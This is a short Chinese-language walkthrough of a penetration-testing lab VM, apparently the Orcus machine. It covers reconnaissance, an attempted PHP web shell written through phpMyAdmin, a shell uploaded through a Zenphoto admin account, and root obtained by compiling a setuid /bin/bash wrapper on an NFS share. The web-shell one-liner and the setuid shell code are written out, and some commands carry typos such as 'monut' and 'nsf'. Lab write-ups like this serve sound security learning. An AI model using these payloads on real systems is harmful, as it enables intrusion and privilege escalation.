前言
国庆第四天œ∑´
千金散尽还复来
主机发现
netdiscover -r 192.168.43.0/24
端口扫描
nmap -A -p- -T4 192.168.43.232
渗透测试
80端口查看,emm没什么发现,针对smb服务我们可以使用enum4linux进行扫描,同样的使用dirb扫描一下目录
可以看到backup目录,可以看到这应该是个网站的源码,下载下来,但是ssh.bak下载不下来,应该是权限的问题,可以看到数据库的用户名和密码,我们可以通过此登录phpmyadmin
我们尝试通过上传一个php shell到web中
select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
此时出现如下报错信息
#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
可以去百度一下,大概意思就是文件的操作权限和用户所拥有的权限是一样的。因此phpmyadmin这条路大概是走不通了。 这里我需要推荐一个字典列表这是别人收集整理的,感觉十分的好用。
接下来我们访问
http://192.168.43.236/zenphoto/
网站看看有什么发现。 这是一个zenphoto的网站
关于这个框架的漏洞我们找到了很多。
但是经过尝试,似乎并没有这么麻烦,通过之前拿到的数据库的用户名和密码,进行登录,然后新建一个管理员进行登录,可以看到有一个上传按钮,我们可以通过上传一个shell然后访问即可。
使用msf生成shell,并建立连接
提权
接下来就是需要提权获取root权限了,中间有一下flag我就不进行获取了,反正最终的目的是为了获取root权限。 我测试了许多本地提权漏洞,但好像都过于麻烦,并且不起作用,经过查看WP,我发现我们可以通过NSF来达到我们的目的。 首先需要安装NSF服务
apt-get install nfs-common
如下命令
showmount --exports 192.168.43.236
显示远程nsf所挂在的文件夹
monut -t nsf 192.168.43.236:/tmp /tmp/nsf
将远程文件夹挂在到本地 通过msf上传shell.c
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
并生成gcc shell.c -o shell文件,通过挂载在kali中
chown root:root shell chmod 4777 shell
然后回到www-data中运行shell程序,即可获取到root 这里我只想说明一下
chmod 4777 shell
的作用 可以参考这里
https://major.io/2007/02/13/chmod-and-the-mysterious-first-octet/
4代表setuid也就是告诉操作系统,你使用该程序所有者的权限去运行它,所以我们可以通过此获取到root权限。
总结
好好赚钱,挣钱养家?,包养萌妹,走向人生巅峰?
参考文章
https://medium.com/@Kan1shka9/hackfest2016-orcus-walkthrough-9c290bad7315
